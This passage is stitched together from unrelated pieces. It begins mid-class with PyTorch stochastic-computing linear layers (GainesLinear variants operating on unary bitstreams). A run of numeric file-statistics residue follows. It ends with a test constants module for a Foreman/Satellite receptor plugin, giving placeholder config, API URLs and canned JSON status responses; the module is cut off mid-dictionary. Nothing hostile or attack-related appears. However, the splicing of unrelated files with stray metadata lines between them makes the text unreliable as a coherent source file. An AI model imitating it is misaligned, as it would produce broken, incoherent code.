raise ValueError("UnaryLinear mode is not implemented.")
# bias indication for original linear layer
self.has_bias = bias
# data bit width
self.bitwidth = bitwidth
# random_sequence from sobol RNG
self.rng = RNG(self.bitwidth, 1, "Sobol")()
# define the convolution weight and bias
self.buf_wght = SourceGen(binary_weight, bitwidth=self.bitwidth, mode=mode, rtype=rtype)()
if self.has_bias is True:
self.buf_bias = SourceGen(binary_bias, bitwidth=self.bitwidth, mode=mode, rtype=rtype)()
# define the kernel linear
self.kernel = torch.nn.Linear(self.in_features, self.out_features, bias=self.has_bias)
self.buf_wght_bs = BSGen(self.buf_wght, self.rng, stype=stype)
self.rng_wght_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.weight, dtype=torch.long), requires_grad=False)
if self.has_bias is True:
self.buf_bias_bs = BSGen(self.buf_bias, self.rng, stype=stype)
self.rng_bias_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.bias, dtype=torch.long), requires_grad=False)
# if bipolar, define a kernel with inverse input, note that there is no bias required for this inverse kernel
if self.mode is "bipolar":
self.kernel_inv = torch.nn.Linear(self.in_features, self.out_features, bias=False)
self.buf_wght_bs_inv = BSGen(self.buf_wght, self.rng, stype=stype)
self.rng_wght_idx_inv = torch.nn.Parameter(torch.zeros_like(self.kernel_inv.weight, dtype=torch.long), requires_grad=False)
self.accumulator = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
if self.scaled is False:
self.out_accumulator = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
def UnaryKernel_accumulation(self, input):
    """Run one unary cycle: emit the current weight/bias bits and apply the kernel.

    `input` is a tensor of 0/1 bits; returns the partial-sum tensor for this
    cycle (sum of direct and, in bipolar mode, inverse kernels).
    """
    # generate weight and bias bits for current cycle
    self.kernel.weight.data = self.buf_wght_bs(self.rng_wght_idx).type(torch.float)
    # weight bitstream index advances only where the input bit is 1
    self.rng_wght_idx.add_(input.type(torch.long))
    if self.has_bias is True:
        self.kernel.bias.data = self.buf_bias_bs(self.rng_bias_idx).type(torch.float)
        self.rng_bias_idx.add_(1)
    kernel_out = self.kernel(input.type(torch.float))
    # bugfix: compare strings with "==", not "is" (identity check relies on
    # CPython interning and emits a SyntaxWarning on modern interpreters)
    if self.mode == "unipolar":
        return kernel_out
    if self.mode == "bipolar":
        # inverse kernel consumes complemented inputs with complemented weight bits
        self.kernel_inv.weight.data = 1 - self.buf_wght_bs_inv(self.rng_wght_idx_inv).type(torch.float)
        self.rng_wght_idx_inv.add_(1 - input.type(torch.long))
        kernel_out_inv = self.kernel_inv(1 - input.type(torch.float))
        return kernel_out + kernel_out_inv
def forward(self, input):
    """Produce one output bit per feature for this cycle of unary accumulation."""
    total = self.UnaryKernel_accumulation(input)
    self.accumulator.data = self.accumulator.add(total)
    if self.scaled is True:
        # scaled mode: emit a 1 whenever the running sum reaches the bound,
        # then wrap the accumulator by that bound
        output = torch.ge(self.accumulator, self.acc_bound).type(torch.float)
        self.accumulator.sub_(output * self.acc_bound)
    else:
        # non-scaled mode: remove the per-cycle offset, then emit a 1 while
        # the input running sum stays ahead of the output running sum
        self.accumulator.sub_(self.offset)
        output = torch.gt(self.accumulator, self.out_accumulator).type(torch.float)
        self.out_accumulator.data = self.out_accumulator.add(output)
    return output.type(self.stype)
class GainesLinear1(torch.nn.Module):
    """
    gMUL + gADD
    Fully connected layer on unary bitstreams (Gaines-style stochastic
    computing). Its API is similar to torch.nn.Linear (input/output feature
    count, bias flag), except it additionally configures:
    1) accumulation mode (scaled or not)
    2) unary data mode ("unipolar" or "bipolar")
    3) binary data width
    4) binary weight
    5) binary bias
    """
    def __init__(self,
                 in_features,
                 out_features,
                 binary_weight=None,
                 binary_bias=None,
                 bitwidth=8,
                 bias=True,
                 mode="bipolar",
                 scaled=True,
                 depth=8,
                 rng_idx=1):
        super(GainesLinear1, self).__init__()
        self.in_features = in_features
        self.out_features = out_features
        # upper bound for accumulation counter in non-scaled mode
        self.acc_bound = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
        self.acc_bound.add_(in_features)
        if bias is True:
            self.acc_bound.add_(1)
        self.mode = mode
        self.scaled = scaled
        # accumulation offset (bipolar streams are centered around 1/2)
        self.offset = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
        # bugfix: compare mode strings with "==", not "is" (identity check)
        if mode == "unipolar":
            pass
        elif mode == "bipolar":
            self.offset.add_((in_features-1)/2)
            if bias is True:
                self.offset.add_(1/2)
        else:
            # bugfix: error message previously named "UnaryLinear"
            raise ValueError("GainesLinear1 mode is not implemented.")
        # bias indication for original linear layer
        self.has_bias = bias
        # data bit width
        self.bitwidth = bitwidth
        # random_sequence from sobol RNG (one sequence per input feature)
        self.rng = RNGMulti(self.bitwidth, in_features, "Sobol")()
        self.rng_bias = RNG(self.bitwidth, in_features+1, "Sobol")()
        # define the convolution weight and bias
        self.buf_wght = SourceGen(binary_weight, bitwidth=self.bitwidth, mode=mode)()
        if self.has_bias is True:
            self.buf_bias = SourceGen(binary_bias, bitwidth=self.bitwidth, mode=mode)()
        # define the kernel linear
        self.kernel = torch.nn.Linear(self.in_features, self.out_features, bias=self.has_bias)
        self.buf_wght_bs = BSGenMulti(self.buf_wght, self.rng, dim=0)
        self.rng_wght_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.weight, dtype=torch.long), requires_grad=False)
        if self.has_bias is True:
            self.buf_bias_bs = BSGen(self.buf_bias, self.rng_bias)
            self.rng_bias_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.bias, dtype=torch.long), requires_grad=False)
        # if bipolar, define a kernel with inverse input, note that there is no bias required for this inverse kernel
        if self.mode == "bipolar":
            self.kernel_inv = torch.nn.Linear(self.in_features, self.out_features, bias=False)
        self.parallel_cnt = torch.nn.Parameter(torch.zeros(1, dtype=torch.long), requires_grad=False)
        if self.scaled is True:
            # NOTE(review): assumes acc_bound is a power of two so log2 is exact — confirm
            self.rng_scale = RNG(round(math.log2(self.acc_bound.item())), (rng_idx+5)%1111, "Sobol")()
            self.rng_scale_idx = torch.nn.Parameter(torch.zeros(1, dtype=torch.long), requires_grad=False)
        elif self.scaled is False:
            self.input_cnt = self.acc_bound.item()
            # saturating up/down counter state for the gADD output
            self.max = torch.nn.Parameter(torch.ones(1, dtype=torch.long).fill_(2**depth-1), requires_grad=False)
            self.half_max = torch.nn.Parameter(torch.ones(1, dtype=torch.long).fill_(2**(depth-1)), requires_grad=False)
            self.cnt = torch.nn.Parameter(torch.zeros(1, dtype=torch.long).fill_(2**(depth-1)), requires_grad=False)

    def GainesKernel_accumulation(self, input):
        """Run one cycle: emit the current weight/bias bits and apply the kernel."""
        # generate weight and bias bits for current cycle
        self.kernel.weight.data = self.buf_wght_bs(self.rng_wght_idx).type(torch.float)
        self.rng_wght_idx.add_(1)
        if self.has_bias is True:
            self.kernel.bias.data = self.buf_bias_bs(self.rng_bias_idx).type(torch.float)
            self.rng_bias_idx.add_(1)
        kernel_out = self.kernel(input.type(torch.float))
        if self.mode == "unipolar":
            return kernel_out
        if self.mode == "bipolar":
            # inverse kernel shares the (complemented) weight bits of this cycle
            self.kernel_inv.weight.data = 1 - self.kernel.weight.data
            kernel_out_inv = self.kernel_inv(1 - input.type(torch.float))
            return kernel_out + kernel_out_inv

    def forward(self, input):
        """Produce one int8 output bit per feature for this cycle."""
        self.parallel_cnt.data = self.GainesKernel_accumulation(input).type(torch.long)
        if self.scaled is True:
            # scaled gADD: stochastic comparison against a scaling RNG sample
            output = torch.ge(self.parallel_cnt.data, self.rng_scale[self.rng_scale_idx%len(self.rng_scale)])
            self.rng_scale_idx.add_(1)
        else:
            if self.mode == "unipolar":
                output = torch.gt(self.parallel_cnt, 0)
            elif self.mode == "bipolar":
                # map the parallel count to a signed step, then saturate-count
                self.parallel_cnt.mul_(2).sub_(self.input_cnt)
                self.cnt.data = self.cnt.add(self.parallel_cnt).clamp(0, self.max.item())
                output = torch.gt(self.cnt, self.half_max)
        return output.type(torch.int8)
class GainesLinear2(torch.nn.Module):
    """
    gMUL + uADD
    Fully connected layer on unary bitstreams with Gaines multiplication and
    unary (accumulator-based) addition. Its API is similar to torch.nn.Linear
    (input/output feature count, bias flag), except it additionally configures:
    1) accumulation mode (scaled or not)
    2) unary data mode ("unipolar" or "bipolar")
    3) binary data width
    4) binary weight
    5) binary bias
    """
    def __init__(self,
                 in_features,
                 out_features,
                 binary_weight=None,
                 binary_bias=None,
                 bitwidth=8,
                 bias=True,
                 mode="bipolar",
                 scaled=True,
                 depth=8,
                 rng_idx=1):
        super(GainesLinear2, self).__init__()
        self.in_features = in_features
        self.out_features = out_features
        # upper bound for accumulation counter in non-scaled mode
        self.acc_bound = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
        self.acc_bound.add_(in_features)
        if bias is True:
            self.acc_bound.add_(1)
        self.mode = mode
        self.scaled = scaled
        # accumulation offset (bipolar streams are centered around 1/2)
        self.offset = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
        # bugfix: compare mode strings with "==", not "is" (identity check)
        if mode == "unipolar":
            pass
        elif mode == "bipolar":
            self.offset.add_((in_features-1)/2)
            if bias is True:
                self.offset.add_(1/2)
        else:
            # bugfix: error message previously named "UnaryLinear"
            raise ValueError("GainesLinear2 mode is not implemented.")
        # bias indication for original linear layer
        self.has_bias = bias
        # data bit width
        self.bitwidth = bitwidth
        # random_sequence from sobol RNG (one sequence per input feature)
        self.rng = RNGMulti(self.bitwidth, in_features, "Sobol")()
        self.rng_bias = RNG(self.bitwidth, in_features+1, "Sobol")()
        # define the convolution weight and bias
        self.buf_wght = SourceGen(binary_weight, bitwidth=self.bitwidth, mode=mode)()
        if self.has_bias is True:
            self.buf_bias = SourceGen(binary_bias, bitwidth=self.bitwidth, mode=mode)()
        # define the kernel linear
        self.kernel = torch.nn.Linear(self.in_features, self.out_features, bias=self.has_bias)
        self.buf_wght_bs = BSGenMulti(self.buf_wght, self.rng, dim=0)
        self.rng_wght_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.weight, dtype=torch.long), requires_grad=False)
        if self.has_bias is True:
            self.buf_bias_bs = BSGen(self.buf_bias, self.rng_bias)
            self.rng_bias_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.bias, dtype=torch.long), requires_grad=False)
        # if bipolar, define a kernel with inverse input, note that there is no bias required for this inverse kernel
        if self.mode == "bipolar":
            self.kernel_inv = torch.nn.Linear(self.in_features, self.out_features, bias=False)
        # running unary accumulator (uADD)
        self.accumulator = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
        if self.scaled is False:
            self.out_accumulator = torch.nn.Parameter(torch.zeros(1), requires_grad=False)

    def GainesKernel_accumulation(self, input):
        """Run one cycle: emit the current weight/bias bits and apply the kernel."""
        # generate weight and bias bits for current cycle
        self.kernel.weight.data = self.buf_wght_bs(self.rng_wght_idx).type(torch.float)
        self.rng_wght_idx.add_(1)
        if self.has_bias is True:
            self.kernel.bias.data = self.buf_bias_bs(self.rng_bias_idx).type(torch.float)
            self.rng_bias_idx.add_(1)
        kernel_out = self.kernel(input.type(torch.float))
        if self.mode == "unipolar":
            return kernel_out
        if self.mode == "bipolar":
            # inverse kernel shares the (complemented) weight bits of this cycle
            self.kernel_inv.weight.data = 1 - self.kernel.weight.data
            kernel_out_inv = self.kernel_inv(1 - input.type(torch.float))
            return kernel_out + kernel_out_inv

    def forward(self, input):
        """Produce one int8 output bit per feature for this cycle."""
        if self.scaled is True:
            # scaled uADD: emit a 1 whenever the running sum reaches the bound, then wrap
            self.accumulator.data = self.accumulator.add(self.GainesKernel_accumulation(input))
            output = torch.ge(self.accumulator, self.acc_bound).type(torch.float)
            self.accumulator.sub_(output * self.acc_bound)
        else:
            # non-scaled uADD: compare input and output running sums
            self.accumulator.data = self.accumulator.add(self.GainesKernel_accumulation(input))
            self.accumulator.sub_(self.offset)
            output = torch.gt(self.accumulator, self.out_accumulator).type(torch.float)
            self.out_accumulator.data = self.out_accumulator.add(output)
        return output.type(torch.int8)
class GainesLinear3(torch.nn.Module):
    """
    uMUL + gADD: this version will not work well, due to same rng is used in
    uMUL, the accumulation will be inaccurate.
    Fully connected layer on unary bitstreams. Its API is similar to
    torch.nn.Linear (input/output feature count, bias flag), except it
    additionally configures:
    1) accumulation mode (scaled or not)
    2) unary data mode ("unipolar" or "bipolar")
    3) binary data width
    4) binary weight
    5) binary bias
    """
    def __init__(self,
                 in_features,
                 out_features,
                 binary_weight=None,
                 binary_bias=None,
                 bitwidth=8,
                 bias=True,
                 mode="bipolar",
                 scaled=True,
                 depth=8,
                 rng_idx=1):
        super(GainesLinear3, self).__init__()
        self.in_features = in_features
        self.out_features = out_features
        # upper bound for accumulation counter in non-scaled mode
        self.acc_bound = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
        self.acc_bound.add_(in_features)
        if bias is True:
            self.acc_bound.add_(1)
        self.mode = mode
        self.scaled = scaled
        # accumulation offset (bipolar streams are centered around 1/2)
        self.offset = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
        # bugfix: compare mode strings with "==", not "is" (identity check)
        if mode == "unipolar":
            pass
        elif mode == "bipolar":
            self.offset.add_((in_features-1)/2)
            if bias is True:
                self.offset.add_(1/2)
        else:
            # bugfix: error message previously named "UnaryLinear"
            raise ValueError("GainesLinear3 mode is not implemented.")
        # bias indication for original linear layer
        self.has_bias = bias
        # data bit width
        self.bitwidth = bitwidth
        # random_sequence from sobol RNG (single shared sequence: see class note)
        self.rng = RNG(self.bitwidth, 1, "Sobol")()
        # define the convolution weight and bias
        self.buf_wght = SourceGen(binary_weight, bitwidth=self.bitwidth, mode=mode)()
        if self.has_bias is True:
            self.buf_bias = SourceGen(binary_bias, bitwidth=self.bitwidth, mode=mode)()
        # define the kernel linear
        self.kernel = torch.nn.Linear(self.in_features, self.out_features, bias=self.has_bias)
        self.buf_wght_bs = BSGen(self.buf_wght, self.rng)
        self.rng_wght_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.weight, dtype=torch.long), requires_grad=False)
        if self.has_bias is True:
            self.buf_bias_bs = BSGen(self.buf_bias, self.rng)
            self.rng_bias_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.bias, dtype=torch.long), requires_grad=False)
        # if bipolar, define a kernel with inverse input, note that there is no bias required for this inverse kernel
        if self.mode == "bipolar":
            self.kernel_inv = torch.nn.Linear(self.in_features, self.out_features, bias=False)
            self.buf_wght_bs_inv = BSGen(self.buf_wght, self.rng)
            self.rng_wght_idx_inv = torch.nn.Parameter(torch.zeros_like(self.kernel_inv.weight, dtype=torch.long), requires_grad=False)
        self.parallel_cnt = torch.nn.Parameter(torch.zeros(1, dtype=torch.long), requires_grad=False)
        if self.scaled is True:
            # NOTE(review): assumes acc_bound is a power of two so log2 is exact — confirm
            self.rng_scale = RNG(round(math.log2(self.acc_bound.item())), (rng_idx+5)%1111, "Sobol")()
            self.rng_scale_idx = torch.nn.Parameter(torch.zeros(1, dtype=torch.long), requires_grad=False)
        elif self.scaled is False:
            self.input_cnt = self.acc_bound.item()
            # saturating up/down counter state for the gADD output
            self.max = torch.nn.Parameter(torch.ones(1, dtype=torch.long).fill_(2**depth-1), requires_grad=False)
            self.half_max = torch.nn.Parameter(torch.ones(1, dtype=torch.long).fill_(2**(depth-1)), requires_grad=False)
            self.cnt = torch.nn.Parameter(torch.zeros(1, dtype=torch.long).fill_(2**(depth-1)), requires_grad=False)

    def UnaryKernel_accumulation(self, input):
        """Run one unary cycle: emit the current weight/bias bits and apply the kernel."""
        # generate weight and bias bits for current cycle
        self.kernel.weight.data = self.buf_wght_bs(self.rng_wght_idx).type(torch.float)
        # weight bitstream index advances only where the input bit is 1
        self.rng_wght_idx.add_(input.type(torch.long))
        if self.has_bias is True:
            self.kernel.bias.data = self.buf_bias_bs(self.rng_bias_idx).type(torch.float)
            self.rng_bias_idx.add_(1)
        kernel_out = self.kernel(input.type(torch.float))
        if self.mode == "unipolar":
            return kernel_out
        if self.mode == "bipolar":
            # inverse kernel consumes complemented inputs with complemented weight bits
            self.kernel_inv.weight.data = 1 - self.buf_wght_bs_inv(self.rng_wght_idx_inv).type(torch.float)
            self.rng_wght_idx_inv.add_(1 - input.type(torch.long))
            kernel_out_inv = self.kernel_inv(1 - input.type(torch.float))
            return kernel_out + kernel_out_inv

    def forward(self, input):
        """Produce one int8 output bit per feature for this cycle."""
        self.parallel_cnt.data = self.UnaryKernel_accumulation(input).type(torch.long)
        if self.scaled is True:
            # scaled gADD: stochastic comparison against a scaling RNG sample
            output = torch.ge(self.parallel_cnt.data, self.rng_scale[self.rng_scale_idx%len(self.rng_scale)])
            self.rng_scale_idx.add_(1)
        else:
            if self.mode == "unipolar":
                output = torch.gt(self.parallel_cnt, 0)
            elif self.mode == "bipolar":
                # map the parallel count to a signed step, then saturate-count
                self.parallel_cnt.mul_(2).sub_(self.input_cnt)
                self.cnt.data = self.cnt.add(self.parallel_cnt).clamp(0, self.max.item())
                output = torch.gt(self.cnt, self.half_max)
        return output.type(torch.int8)
class GainesLinear4(torch.nn.Module):
    """
    gMUL + gADD,
    this module is the same as GainesLinear1, except the rng is lfsr.
    Fully connected layer on unary bitstreams. Its API is similar to
    torch.nn.Linear (input/output feature count, bias flag), except it
    additionally configures:
    1) accumulation mode (scaled or not)
    2) unary data mode ("unipolar" or "bipolar")
    3) binary data width
    4) binary weight
    5) binary bias
    """
    def __init__(self,
                 in_features,
                 out_features,
                 binary_weight=None,
                 binary_bias=None,
                 bitwidth=8,
                 bias=True,
                 mode="bipolar",
                 scaled=True,
                 depth=8,
                 rng_idx=1):
        super(GainesLinear4, self).__init__()
        self.in_features = in_features
        self.out_features = out_features
        # upper bound for accumulation counter in non-scaled mode
        self.acc_bound = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
        self.acc_bound.add_(in_features)
        if bias is True:
            self.acc_bound.add_(1)
        self.mode = mode
        self.scaled = scaled
        # accumulation offset (bipolar streams are centered around 1/2)
        self.offset = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
        # bugfix: compare mode strings with "==", not "is" (identity check)
        if mode == "unipolar":
            pass
        elif mode == "bipolar":
            self.offset.add_((in_features-1)/2)
            if bias is True:
                self.offset.add_(1/2)
        else:
            # bugfix: error message previously named "UnaryLinear"
            raise ValueError("GainesLinear4 mode is not implemented.")
        # bias indication for original linear layer
        self.has_bias = bias
        # data bit width
        self.bitwidth = bitwidth
        # random_sequence from LFSR RNG (one sequence per input feature)
        self.rng = RNGMulti(self.bitwidth, in_features, "LFSR")()
        self.rng_bias = RNG(self.bitwidth, in_features+1, "LFSR")()
        # define the convolution weight and bias
        self.buf_wght = SourceGen(binary_weight, bitwidth=self.bitwidth, mode=mode)()
        if self.has_bias is True:
            self.buf_bias = SourceGen(binary_bias, bitwidth=self.bitwidth, mode=mode)()
        # define the kernel linear
        self.kernel = torch.nn.Linear(self.in_features, self.out_features, bias=self.has_bias)
        self.buf_wght_bs = BSGenMulti(self.buf_wght, self.rng, dim=0)
        self.rng_wght_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.weight, dtype=torch.long), requires_grad=False)
        if self.has_bias is True:
            self.buf_bias_bs = BSGen(self.buf_bias, self.rng_bias)
            self.rng_bias_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.bias, dtype=torch.long), requires_grad=False)
        # if bipolar, define a kernel with inverse input, note that there is no bias required for this inverse kernel
        if self.mode == "bipolar":
            self.kernel_inv = torch.nn.Linear(self.in_features, self.out_features, bias=False)
        self.parallel_cnt = torch.nn.Parameter(torch.zeros(1, dtype=torch.long), requires_grad=False)
        if self.scaled is True:
            # NOTE(review): assumes acc_bound is a power of two so log2 is exact — confirm
            self.rng_scale = RNG(round(math.log2(self.acc_bound.item())), (rng_idx+5)%1111, "LFSR")()
            self.rng_scale_idx = torch.nn.Parameter(torch.zeros(1, dtype=torch.long), requires_grad=False)
        elif self.scaled is False:
            self.input_cnt = self.acc_bound.item()
            # saturating up/down counter state for the gADD output
            self.max = torch.nn.Parameter(torch.ones(1, dtype=torch.long).fill_(2**depth-1), requires_grad=False)
            self.half_max = torch.nn.Parameter(torch.ones(1, dtype=torch.long).fill_(2**(depth-1)), requires_grad=False)
            self.cnt = torch.nn.Parameter(torch.zeros(1, dtype=torch.long).fill_(2**(depth-1)), requires_grad=False)

    def GainesKernel_accumulation(self, input):
        """Run one cycle: emit the current weight/bias bits and apply the kernel."""
        # generate weight and bias bits for current cycle
        self.kernel.weight.data = self.buf_wght_bs(self.rng_wght_idx).type(torch.float)
        self.rng_wght_idx.add_(1)
        if self.has_bias is True:
            self.kernel.bias.data = self.buf_bias_bs(self.rng_bias_idx).type(torch.float)
            self.rng_bias_idx.add_(1)
        kernel_out = self.kernel(input.type(torch.float))
        if self.mode == "unipolar":
            return kernel_out
        if self.mode == "bipolar":
            # inverse kernel shares the (complemented) weight bits of this cycle
            self.kernel_inv.weight.data = 1 - self.kernel.weight.data
            kernel_out_inv = self.kernel_inv(1 - input.type(torch.float))
            return kernel_out + kernel_out_inv

    def forward(self, input):
        """Produce one int8 output bit per feature for this cycle."""
        self.parallel_cnt.data = self.GainesKernel_accumulation(input).type(torch.long)
        if self.scaled is True:
            # scaled gADD: stochastic comparison against a scaling RNG sample
            output = torch.ge(self.parallel_cnt.data, self.rng_scale[self.rng_scale_idx%len(self.rng_scale)])
            self.rng_scale_idx.add_(1)
        else:
            if self.mode == "unipolar":
                output = torch.gt(self.parallel_cnt, 0)
            elif self.mode == "bipolar":
                # map the parallel count to a signed step, then saturate-count
                self.parallel_cnt.mul_(2).sub_(self.input_cnt)
                self.cnt.data = self.cnt.add(self.parallel_cnt).clamp(0, self.max.item())
                output = torch.gt(self.cnt, self.half_max)
        return output.type(torch.int8)
| 43.75256
| 135
| 0.618355
| 3,407
| 25,639
| 4.481655
| 0.04843
| 0.033925
| 0.042963
| 0.056389
| 0.962146
| 0.962146
| 0.954745
| 0.953435
| 0.953435
| 0.9461
| 0
| 0.009836
| 0.282304
| 25,639
| 586
| 136
| 43.75256
| 0.819955
| 0.126721
| 0
| 0.913924
| 0
| 0
| 0.022461
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037975
| false
| 0.012658
| 0.007595
| 0
| 0.096203
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a1b60cf095623bc5ad388640ead31affce2bc547
| 24,502
|
py
|
Python
|
tests/constants.py
|
adamruzicka/receptor-satellite-1
|
5479ab5cf1d9fc1353190f9122993caeec44ee61
|
[
"Apache-2.0"
] | 2
|
2020-02-27T18:47:16.000Z
|
2020-03-03T14:01:01.000Z
|
tests/constants.py
|
adamruzicka/receptor-satellite-1
|
5479ab5cf1d9fc1353190f9122993caeec44ee61
|
[
"Apache-2.0"
] | 9
|
2020-06-17T10:55:16.000Z
|
2021-02-19T15:29:16.000Z
|
tests/constants.py
|
adamruzicka/receptor-satellite-1
|
5479ab5cf1d9fc1353190f9122993caeec44ee61
|
[
"Apache-2.0"
] | 1
|
2020-02-17T21:47:47.000Z
|
2020-02-17T21:47:47.000Z
|
import json
# Public API of this constants module, grouped by purpose.
__all__ = [
    # plugin configuration
    "PLUGIN_CONFIG",
    # instance identifiers
    "UUID",
    "BAD_UUID",
    # API endpoints
    "UUID_URL",
    "STATUSES_URL",
    # canned HTTP response bodies
    "MISSING_UUID_RESPONSE_BODY",
    "UUID_RESPONSE_BODY",
    "STATUSES_RESPONSE_BODY",
    "NO_ANSIBLE_STATUSES_RESPONSE_BODY",
    "NO_CAPSULES_STATUSES_RESPONSE_BODY",
    "DOWN_CAPSULE_STATUSES_RESPONSE_BODY",
]
# Connection settings handed to the plugin under test.
PLUGIN_CONFIG = {
    "username": "username",
    "password": "password",
    "url": "http://localhost",
    "ca_file": None,
}

# A well-formed Foreman instance UUID and an intentionally invalid one.
UUID = "dd77f17a-2fe1-4f7a-b220-58f4140a1f9e"
BAD_UUID = "1"

# API endpoints derived from the configured base URL.
UUID_URL = PLUGIN_CONFIG["url"] + "/api/settings?search=name%20%3D%20instance_id"
STATUSES_URL = PLUGIN_CONFIG["url"] + "/api/statuses"
# Settings API response for a search that matches no "instance_id" setting
# (subtotal 0, empty results). Key order matches the original literal so the
# serialized JSON string is byte-identical.
MISSING_UUID_RESPONSE_BODY = json.dumps(
    dict(
        total=230,
        subtotal=0,
        page=1,
        per_page=20,
        search="name = instance_id",
        sort={"by": None, "order": None},
        results=[],
    )
)
# The single "instance_id" setting record embedded in the response below.
_INSTANCE_ID_SETTING = {
    "value": UUID,
    "description": "Foreman instance ID, uniquely identifies this Foreman instance.",
    "category": "Setting::General",
    "settings_type": "string",
    "default": "uuid",
    "created_at": "2019-11-18 11:51:49 UTC",
    "updated_at": "2019-11-18 11:51:49 UTC",
    "id": 128,
    "name": "instance_id",
    "full_name": "Foreman UUID",
    "category_name": "General",
}

# Settings API response where the "instance_id" setting is found (subtotal 1).
UUID_RESPONSE_BODY = json.dumps(
    {
        "total": 230,
        "subtotal": 1,
        "page": 1,
        "per_page": 20,
        "search": "name = instance_id",
        "sort": {"by": None, "order": None},
        "results": [_INSTANCE_ID_SETTING],
    }
)
# Full /api/statuses response fixture: foreman core info, the installed plugin
# list (including foreman_ansible), one healthy smart proxy whose features
# include "ansible", compute resources, and katello service statuses.
STATUSES_RESPONSE_BODY = json.dumps(
    {
        "results": {
            "foreman": {
                "version": "1.24.0",
                "api": {"version": "v2"},
                "plugins": [
                    "Foreman plugin: foreman-tasks, 0.17.5, Ivan Ne\u010das, The goal of this plugin is to unify the way of showing task statuses across the Foreman instance.\nIt defines Task model for keeping the information about the tasks and Lock for assigning the tasks\nto resources. The locking allows dealing with preventing multiple colliding tasks to be run on the\nsame resource. It also optionally provides Dynflow infrastructure for using it for managing the tasks.\n",
                    "Foreman plugin: foreman_ansible, 4.0.3, Daniel Lobato Garcia, Ansible integration with Foreman",
                    "Foreman plugin: foreman_bootdisk, 16.0.0, Dominic Cleal, Plugin for Foreman that creates iPXE-based boot disks to provision hosts without the need for PXE infrastructure.",
                    "Foreman plugin: foreman_discovery, 16.0.1, Aditi Puntambekar, alongoldboim, Alon Goldboim, amirfefer, Amit Karsale, Amos Benari, Avi Sharvit, Bryan Kearney, bshuster, Daniel Lobato, Daniel Lobato Garcia, Daniel Lobato Garc\u00eda, Danny Smit, David Davis, Djebran Lezzoum, Dominic Cleal, Eric D. Helms, Ewoud Kohl van Wijngaarden, Frank Wall, Greg Sutcliffe, ChairmanTubeAmp, Ido Kanner, imriz, Imri Zvik, Ivan Ne\u010das, Joseph Mitchell Magen, June Zhang, kgaikwad, Lars Berntzon, ldjebran, Lukas Zapletal, Luk\u00e1\u0161 Zapletal, Marek Hulan, Marek Hul\u00e1n, Martin Ba\u010dovsk\u00fd, Matt Jarvis, Michael Moll, Nick, odovzhenko, Ohad Levy, Ondrej Prazak, Ond\u0159ej Ezr, Ori Rabin, orrabin, Partha Aji, Petr Chalupa, Phirince Philip, Rahul Bajaj, Robert Antoni Buj Gelonch, Scubafloyd, Sean O\\'Keeffe, Sebastian Gra\u0308\u00dfl, Shimon Shtein, Shlomi Zadok, Stephen Benjamin, Swapnil Abnave, Thomas Gelf, Timo Goebel, Tomas Strych, Tom Caspy, Tomer Brisker, and Yann C\u00e9zard, MaaS Discovery Plugin engine for Foreman",
                    "Foreman plugin: foreman_hooks, 0.3.15, Dominic Cleal, Plugin engine for Foreman that enables running custom hook scripts on Foreman events",
                    "Foreman plugin: foreman_inventory_upload, 1.0.2, Inventory upload team, Foreman plugin that process & upload data to cloud based host inventory",
                    "Foreman plugin: foreman_openscap, 2.0.2, slukasik@redhat.com, Foreman plug-in for managing security compliance reports",
                    "Foreman plugin: foreman_remote_execution, 2.0.6, Foreman Remote Execution team, A plugin bringing remote execution to the Foreman, completing the config management functionality with remote management functionality.",
                    "Foreman plugin: foreman_templates, 7.0.5, Greg Sutcliffe, Engine to synchronise provisioning templates from GitHub",
                    "Foreman plugin: foreman_theme_satellite, 5.0.1.5, Alon Goldboim, Shimon Stein, Theme changes for Satellite 6.",
                    "Foreman plugin: foreman_virt_who_configure, 0.5.0, Foreman virt-who-configure team, A plugin to make virt-who configuration easy",
                    "Foreman plugin: katello, 3.14.0.1, N/A, Katello adds Content and Subscription Management to Foreman. For this it relies on Candlepin and Pulp.",
                    "Foreman plugin: redhat_access, 2.2.8, Lindani Phiri, This plugin adds Red Hat Access knowledge base search, case management and diagnostics to Foreman",
                ],
                # one healthy capsule advertising the "ansible" feature
                "smart_proxies": [
                    {
                        "name": "foreman-nuc1.usersys.redhat.com",
                        "status": "ok",
                        "duration_ms": "138",
                        "version": "1.24.0",
                        "features": {
                            "pulp": "1.5.0",
                            "dynflow": "0.2.4",
                            "ansible": "3.0.1",
                            "discovery": "1.0.5",
                            "openscap": "0.7.2",
                            "ssh": "0.2.1",
                            "dns": "1.24.0",
                            "templates": "1.24.0",
                            "tftp": "1.24.0",
                            "dhcp": "1.24.0",
                            "puppetca": "1.24.0",
                            "puppet": "1.24.0",
                            "logs": "1.24.0",
                            "httpboot": "1.24.0",
                        },
                        "failed_features": {},
                    }
                ],
                "compute_resources": [
                    {
                        "name": "libvirt",
                        "status": "ok",
                        "duration_ms": "85",
                        "errors": [],
                    }
                ],
                "database": {"active": True, "duration_ms": "0"},
            },
            "katello": {
                "version": "3.14.0.1",
                "timeUTC": "2020-02-18 19:52:16 UTC",
                "services": {
                    "pulp": {"status": "ok", "duration_ms": "31"},
